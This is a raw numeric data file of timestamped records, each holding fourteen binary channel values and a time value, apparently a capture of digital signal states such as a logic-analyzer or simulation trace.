1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769124e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769148e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769172e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769196e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769220e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1769228e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1769244e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1769272e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1769296e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1769324e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1769348e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1769372e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769380e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769396e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769420e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769444e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769472e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769524e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769548e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769596e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769620e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769672e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769700e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769748e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769772e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769820e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769848e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769900e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769924e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769948e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769972e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769996e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1770020e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1770028e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1770044e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1770072e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1770096e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1770124e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1770148e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1770172e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1770196e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1770220e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1770228e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1770244e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1770272e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1770296e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1770324e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1770348e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1770372e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,2.1770376e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1770380e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1770396e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1770420e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1770444e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1770472e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1770496e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1770524e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1770548e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1770572e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1770580e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1770596e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1770620e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1770644e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1770672e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1770724e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1770748e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1770796e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1770820e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1770872e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1770900e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1770948e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1770972e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771020e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771048e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771100e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771124e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771148e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771172e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771196e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771220e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771244e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771272e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771296e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771324e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771348e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771372e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771396e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771420e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771444e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771472e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771496e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771524e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771548e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771572e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771596e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771620e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771644e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771672e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771696e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771724e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771748e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771772e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771796e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771820e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771844e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771872e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771896e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771924e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771948e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1771972e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1771996e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1772020e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1772044e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1772072e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1772096e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1772124e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1772148e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1772172e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1772196e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1772220e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1772244e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1772272e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1772296e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1772324e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,1,2.1896876e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,2.1897068e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.1897092e-02 0,1,1,0,1,0,0,0,0,0,0,1,0,1,2.1897116e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.1897144e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,2.1897436e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.1897460e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,2.1897488e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.1897512e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,2.1897536e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.1897564e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,2.1897588e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.1897612e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,2.1897636e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.1897660e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,2.1897684e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1897708e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1897712e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1897740e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1897764e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1897788e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1897812e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1897836e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1897860e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1897884e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1897912e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1897940e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1897964e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1897988e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898012e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898036e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898060e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898084e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898108e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898132e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898160e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898184e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898212e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898236e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898260e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898284e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898308e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898332e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898360e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898384e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898412e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898436e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898460e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898484e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898508e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898532e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898560e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898584e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898612e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898636e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898660e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898684e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898708e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898732e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898760e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898784e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898812e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898836e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898860e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898884e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898912e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898932e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1898960e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1898984e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899012e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899036e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899060e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899084e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899108e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899132e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899160e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899184e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899212e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899236e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899260e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899284e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899308e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899332e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899360e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899384e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899412e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899436e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899460e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899484e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899508e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899532e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899560e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899584e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899612e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899636e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899660e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899684e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899708e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899732e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899760e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899784e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899812e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1899836e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1899860e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1899864e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1899884e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1899908e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1899932e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1899960e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1899984e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1900012e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1900036e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1900060e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1900084e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1900108e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1900132e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1900160e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900164e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900184e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900212e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900236e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900260e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900284e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900308e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900332e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900360e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900384e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900412e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900436e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900460e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900484e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900508e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900532e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900560e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900584e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900612e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900636e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900660e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900684e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900708e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900732e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900760e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900784e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900812e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900836e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900860e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900884e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900908e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900932e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1900960e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1900984e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901012e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901036e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901060e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901084e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901108e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901132e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901160e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901184e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901212e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901236e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901260e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1901264e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1901284e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1901308e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1901332e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1901360e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1901384e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1901412e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1901436e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1901460e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1901484e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1901508e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1901532e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1901560e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901564e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901584e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901612e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901636e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901660e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901684e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901708e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901732e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901760e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901784e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901812e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901836e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901860e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901884e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901908e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901932e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1901960e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1901984e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902012e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902036e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902060e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902084e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902108e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902132e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902160e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902184e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902212e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902236e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902260e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902284e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902308e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1902316e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1902332e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1902360e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1902384e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1902412e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1902436e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1902460e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1902484e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1902508e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1902532e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1902560e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,2.1902584e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,2.1902612e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902616e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902636e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902660e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902684e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902708e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902732e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902760e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902784e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902812e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902836e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902860e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902884e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902908e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902932e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1902960e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1902984e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903012e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903036e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903060e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903084e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903108e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903132e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903160e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903184e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903212e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903236e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903260e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903284e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903308e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903332e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903360e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903384e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903412e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903436e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903460e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903484e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903508e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903532e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903560e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903584e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903612e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903636e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903660e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903684e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903728e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903752e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903780e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,2.1903804e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,2.1903828e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,2.2028780e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.2028972e-02 1,1,1,0,1,0,0,0,0,0,0,1,0,1,2.2028988e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.2029012e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.2029284e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.2029308e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.2029328e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.2029352e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.2029380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.2029404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.2029428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.2029452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,2.2029476e-02 